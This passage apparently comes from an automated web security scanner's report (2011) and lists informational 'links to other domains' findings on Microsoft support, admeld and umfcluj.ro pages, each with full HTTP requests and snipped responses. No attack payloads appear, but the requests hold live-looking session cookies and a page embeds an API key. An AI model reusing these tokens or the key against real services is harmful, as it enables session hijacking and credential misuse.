<a id="ad_brnd_corpflyoutad_go" href="http://clk.atdmt.com/MRT/go/335774571/direct/01/">
<img src="/library/images/support/en-US/IE9_btn-up.png" alt="" onmouseover="this.src='/library/images/support/en-US/IE9_btn-hov.png';" onmouseout="this.src='/library/images/support/en-US/IE9_btn-up.p
...[SNIP]...
<li class="gsfx_brnd_LocalLink"><a href="http://www.microsoftstore.com/store/msstore/home?WT.mc_id=SMCBAR_ENUS_ADR_BUYALL" id="L_195944"><span>
...[SNIP]...
<noscript><img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No" /></noscript>
...[SNIP]...

20.42. http://support.microsoft.com/contactus/contact_microsoft_customer_serv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.microsoft.com
Path:   /contactus/contact_microsoft_customer_serv

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /contactus/contact_microsoft_customer_serv?&fr=1 HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311077969178:ss=1311077969178; ST_GN_EN-US=4_0_0; fmsmemo=st=|13083; sdninc=1; .ASPXANONYMOUS=8NdXF7l8zAEkAAAAOTNmYmRiYmItMTcxOC00YjJmLTk5MjktM2JlNjA2ZTMzZGE4u0DvQbMalALZUZsx-OjG8HS4AQM1; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; fmshb=0,1311089271820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:27:46 GMT
Content-Length: 8442

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="contact_microsoft_customer_serv" /><meta name="DCSext.sup_cln" content="en-us" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCS
...[SNIP]...
<noscript><img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No" /></noscript>
...[SNIP]...

20.43. http://support.microsoft.com/oas/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.microsoft.com
Path:   /oas/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /oas/default.aspx?gprid=assistance HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/gp/csa
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; exitinfo=dm|1033|cu_selector|en-us||L_157327; sdninc=7; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078701004:ss=1311077969178; wedcsinc=4; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.NumberOfVisits=5&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=72&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; fmshb=0,1311089574577; .ASPXANONYMOUS=wyYN87p8zAEkAAAAOTJlNjVlOGEtMGU1MS00OTgxLWExZjktMTk1MGM2NTY3ZTkzBrihrgf1hSvtYtVeJLdxlWPcstU1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:32:49 GMT
Content-Length: 37716

<html lang="en-US"><head><meta name="ms.gsfxversion" content="7.6.9.0" /><meta name="ms.sup_cid" content="oas" /><meta name="ms.sup_cln" content="en-us" /><meta name="ms.sup_ct" content="dm" /><meta n
...[SNIP]...
<img src="/library/images/support/CN/CPS_IE9_icon.png" alt="Get Internet Explorer 9 today. Free download." /> <a href="http://clk.atdmt.com/MRT/go/335774571/direct/01/">Get Internet Explorer 9 today. Free download.</a>
...[SNIP]...
</a>
<a id="ad_brnd_corpflyoutad_go" href="http://clk.atdmt.com/MRT/go/335774571/direct/01/">
<img src="/library/images/support/en-US/IE9_btn-up.png" alt="" onmouseover="this.src='/library/images/support/en-US/IE9_btn-hov.png';" onmouseout="this.src='/library/images/support/en-US/IE9_btn-up.p
...[SNIP]...
<li class="gsfx_brnd_LocalLink"><a href="http://www.microsoftstore.com/store/msstore/home?WT.mc_id=SMCBAR_ENUS_ADR_BUYALL" id="L_195944"><span>
...[SNIP]...
<noscript><img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No" /></noscript>
...[SNIP]...

20.44. https://support.microsoft.com/oas/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.microsoft.com
Path:   /oas/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn HTTP/1.1
Host: support.microsoft.com
Connection: keep-alive
Referer: http://support.microsoft.com/oas/default.aspx?gprid=assistance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; sdninc=7; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078701004:ss=1311077969178; wedcsinc=4; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.NumberOfVisits=5&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=72&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=wyYN87p8zAEkAAAAOTJlNjVlOGEtMGU1MS00OTgxLWExZjktMTk1MGM2NTY3ZTkzBrihrgf1hSvtYtVeJLdxlWPcstU1; fmshb=0,1311089576069; exitinfo=gp|1033|csa|en-us||L_174092; WFXSMCToken=1; AuthKey=SMC; WFXLANG=en-us

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:32:54 GMT
Content-Length: 38036

<html lang="en-US"><head><meta name="ms.gsfxversion" content="7.6.9.0" /><meta name="ms.sup_cid" content="oas" /><meta name="ms.sup_cln" content="en-us" /><meta name="ms.sup_ct" content="dm" /><meta n
...[SNIP]...
<noscript><img alt="" id="DCSIMG" width="1" height="1" src="https://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No" /></noscript>
...[SNIP]...

20.45. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1512
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...
</script>


<img width="0" height="0" src="http://map.media6degrees.com/orbserv/hbpix?pixId=3949&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=304&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

<img width="0" height="0" src="http://www.wtp101.com/admeld_sync?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=485&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>


</body>
...[SNIP]...

20.46. http://umfcluj.ro/Detaliu.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /Detaliu.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:36:38 GMT
Content-Length: 61593


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutors</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Download</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutors</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Download</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">
                                       
                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&amp;eID=289&amp;c=0&amp;m=0&amp;y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en.png" />
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.47. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lista.aspx?t=Revista-Clujul-Medical HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:21 GMT
Content-Length: 62576


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">
                                       
                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&amp;eID=289&amp;c=0&amp;m=0&amp;y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<br />
<a href="http://www.clujulmedical.umfcluj.ro">www.clujulmedical.umfcluj.ro</a>
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.48. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lista.aspx?t=Studenti-actuali-Prezentare HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/search.aspx?caut=xss
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:35:37 GMT
Content-Length: 64989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
